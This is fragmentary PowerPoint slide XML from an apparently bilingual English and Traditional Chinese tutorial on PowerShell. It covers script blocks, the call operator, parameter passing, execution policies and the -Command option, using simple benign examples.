            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Office files- Word, Excel, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Remotely:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PowerShell Remoting (PSS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, WMI.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PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execution Options       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Max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Malyutin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5765-4925-4C39-843B-55AAF0368D7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874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2675467"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr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can also execute script blocks that have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 blocks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Parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>are assigned by position using the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altLang="zh-TW" dirty="0"/>
              <a:t> parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.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 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($p1, $p2)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$p1"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"p2: $p2"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"First", "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Second"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Parameter Blocks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24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2675467"/>
            <a:ext cx="885698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 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW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($p1, $p2)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"p1: $p1"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"p2: $p2"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} -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ArgumentList</a:t>
            </a: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"First", "Second"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p1: First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p2: Second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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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Execution Result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88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2675467"/>
            <a:ext cx="8640960" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>You can use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en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to store and execute script blocks.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example below stores a script block in a variable and passes it to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 = { Get-Service BITS }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 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Variables and Script Blocks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0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2420888"/>
            <a:ext cx="8640960" cy="4194400"/>
          </a:xfrm>
        </p:spPr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operator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>another way to execute script blocks stored in a variable. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Like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, the call operator executes the script block in a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scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. The call operator can make it easier for you to use parameters with your script blocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.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 ={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($p1, $p2)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$p1"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"p2: $p2"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&amp;$a -p2 "First" -p1 "Second"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43</a:t>
            </a:fld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Call Operator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71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564904"/>
            <a:ext cx="8568952" cy="417646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>執行命令、腳本或腳本區塊。 呼叫運算子也稱為「調用運算子」，可讓您執行儲存在變數中，並以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字串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腳本區塊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示的命令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此範例會將命令儲存在字串中，並使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>運算子來執行它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PS&gt;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PS&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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endParaRPr lang="en-US" altLang="zh-TW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 = "get-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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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PS&gt;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$c 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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$c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01943" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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AllSigned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呼叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>運算子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 smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Micorsoft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164288" y="4590420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same results</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="手繪多邊形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508500" y="4191000"/>
            <a:ext cx="2654300" cy="546100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2654300"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 546100"/>
              <a:gd name="connsiteX1" fmla="*/ 1981200 w 2654300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 546100"/>
              <a:gd name="connsiteX2" fmla="*/ 1981200 w 2654300"/>
              <a:gd name="connsiteY2" fmla="*/ 546100 h 546100"/>
              <a:gd name="connsiteX3" fmla="*/ 2654300 w 2654300"/>
              <a:gd name="connsiteY3" fmla="*/ 54610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300" h="546100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1981200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1981200" y="546100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2654300" y="546100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="635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>
            <a:off x="4508500" y="4737100"/>
            <a:ext cx="1981200" cy="571500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1981200 w 1981200"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 571500"/>
              <a:gd name="connsiteX1" fmla="*/ 1981200 w 1981200"/>
              <a:gd name="connsiteY1" fmla="*/ 571500 h 571500"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1981200"/>
              <a:gd name="connsiteY2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571500">
                <a:moveTo>
                  <a:pt x="1981200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1981200" y="571500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="571500"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:cu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4533900" y="5308600"/>
            <a:ext cx="1955800" cy="647700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1955800 w 1955800"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 647700"/>
              <a:gd name="connsiteX1" fmla="*/ 1955800 w 1955800"/>
              <a:gd name="connsiteY1" fmla="*/ 647700 h 647700"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1955800"/>
              <a:gd name="connsiteY2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5800" h="647700">
                <a:moveTo>
                  <a:pt x="1955800" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1955800" y="647700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="647700"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:cu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2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41764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sz="3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zh-TW" altLang="en-US" sz="3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3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 = get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="34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zh-TW" altLang="en-US" sz="3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sz="3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altLang="zh-TW" sz="3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de-DE" altLang="zh-TW" sz="3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de-DE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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Restricted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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altLang="zh-TW" sz="3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de-DE" altLang="zh-TW" sz="3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de-DE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$b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Restricted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="34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altLang="zh-TW" sz="3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de-DE" altLang="zh-TW" sz="3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de-DE" altLang="zh-TW" sz="3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$b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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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無法辨識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'Restricted' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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詞彙是否為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Cmdlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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、函數、指令檔或可執行程式的名稱。請檢查名稱拼字是否正確，如果包含路徑的話，請確認路徑是否正確，然後再試一次。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位於 線路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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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字元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:3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&amp; $b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~~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CategoryInfo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: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ObjectNotFound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Restricted:String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[],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CommandNotFoundException</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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FullyQualifiedErrorId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CommandNotFoundException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 Value without Quotes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="手繪多邊形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511300" y="3987800"/>
            <a:ext cx="215900" cy="584200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 215900"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 584200"/>
              <a:gd name="connsiteX1" fmla="*/ 215900 w 215900"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 584200"/>
              <a:gd name="connsiteX2" fmla="*/ 215900 w 215900"/>
              <a:gd name="connsiteY2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584200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="215900" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215900" y="584200"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="63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4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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a collection of statements surrounded with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zh-TW" dirty="0"/>
              <a:t> curly parentheses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dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>scriptblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> can be saved in a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altLang="zh-TW" dirty="0"/>
              <a:t> and executed using the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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>call operator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b="1" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1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$alert = { "Hello World" } </a:t>
            </a:r>
            <a:b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$alert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Notice that to execute a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> you must use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>call operator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> “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”, just defining the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is not enough.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ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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2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endParaRPr lang="en-US" altLang="zh-TW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$alert = {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$alert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altLang="zh-TW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$alert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$alert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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en-US" altLang="zh-TW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r>
              <a:rPr lang="en-US" altLang="zh-TW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{$a = 123 ;  Echo $a ; "Hello" }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 = 123 ;  Echo $a ; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Hello“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altLang="zh-TW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altLang="zh-TW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0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1" y="2675467"/>
            <a:ext cx="8568952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{"hello"}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Echo "hello"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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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4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script block can be written to include multiple lines of code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{$a = 123</a:t>
            </a:r>
            <a:b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Echo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  <a:b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49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Multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>lines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54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Windows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開始使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>手冊 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>forsenergy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r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4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496944" cy="3450696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/>
              <a:t>However in many of the places where you will want to use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, it is more convenient to keep everything on a single line, so use the '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zh-TW" dirty="0"/>
              <a:t>' continuation character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{$b = 456 ; Echo $b }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 = 456 ; Echo $b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mysb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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C:\Windows\system32&gt;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Continuation Character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SS64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Executes the specified commands (and any parameters) as though they were typed at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>PowerShell command prompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and then exits, unless the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dirty="0"/>
              <a:t> parameter is specified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The value of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can be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dirty="0"/>
              <a:t>, a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 block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, or a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If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the value of Command is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dirty="0"/>
              <a:t>, the command text is read from standard input.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3ACC-DB9C-41B7-AAD9-18557339C754}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>51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 smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6189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parameter only accepts a script block for execution when it can recognize the value passed to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as a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ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> type.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This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is only possible when running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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> from another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PowerShell host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a: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-Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1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82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1" cy="345069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 如同在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows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命令提示字元中輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一樣執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指定的命令 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>和任何參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，然後結束 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>除非指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>了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dirty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 smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>值可以是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、字串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或指令碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>區塊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If seems that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> does not work now.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9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19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-Command  "write-host 'Hello'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="19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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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9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19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-Command  "'Hello'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="19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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="19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9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zh-TW" altLang="en-US" sz="19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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="-250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-?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  <a:endParaRPr lang="zh-TW" altLang="en-US" i="1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如果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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>值是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令碼區塊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，則指令碼區塊必須包含在大括號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(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altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>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您</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>只能在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows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中執行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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>時指定指令碼區塊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指令碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>區塊的結果會以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>還原序列化 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>而不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>即時物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>傳回至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>父 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="-250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-?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28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如果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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>值是字串，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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>必須是命令中的最後參數，因為在命令後輸入的任何字元都會解讀為命令引數。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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="-250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-?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84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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>若要撰寫執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令的字串，請使用格式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"&amp; {&lt;command&gt;}"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>引號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>叫用運算子 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(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) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>會導致命令執行。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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="-250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baseline="-25000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-?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25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71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 -Command {Get-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EventLog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LogName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security}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 -Command "&amp; {Get-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EventLog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LogName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security}"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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  <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="-250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-?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty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98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跟一般的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令稿語言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（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 language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）一樣，可以直接在互動式的視窗中執行，若程式碼比較長的話，也可以把指令寫在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令稿檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（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 file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）當中，一次執行檔案內所有的指令。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指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>稿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68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6"/>
